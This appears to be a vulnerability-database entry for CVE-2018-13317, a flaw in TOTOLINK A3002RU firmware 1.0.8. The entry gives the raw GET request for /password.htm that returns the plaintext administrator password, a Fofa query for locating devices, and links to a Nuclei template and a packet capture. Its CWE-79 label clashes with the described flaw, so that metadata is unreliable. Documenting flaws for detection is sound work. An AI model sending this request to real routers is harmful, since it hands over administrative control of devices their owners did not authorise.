🔙 목록으로 돌아가기

CVE-2018-13317: TOTOLINK A3002RU 1.0.8 - Information Disclosure

TitleTOTOLINK A3002RU 1.0.8 - Information Disclosure
Authorritikchaddha
SeverityMedium
ImpactUnauthenticated attackers can obtain the plaintext administrator password without any authentication, leading to complete device compromise.
RemediationUpdate to the latest firmware version that addresses this vulnerability.
CVSS Score6.1
EPSS Score0.00262
CVE IDCVE-2018-13317
CWE IDCWE-79
Fofa Querytitle="totolink"
Tags cve cve2018 totolink password exposure vkev

🔍 Vulnerability Description

TOTOLINK A3002RU firmware version 1.0.8 contains a vulnerability in which an unauthenticated attacker can obtain the plaintext admin password by making a GET request for password.htm. This allows remote attackers to gain administrative access without credentials.

🌐 HTTP Request

GET /password.htm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13317.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-13317.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A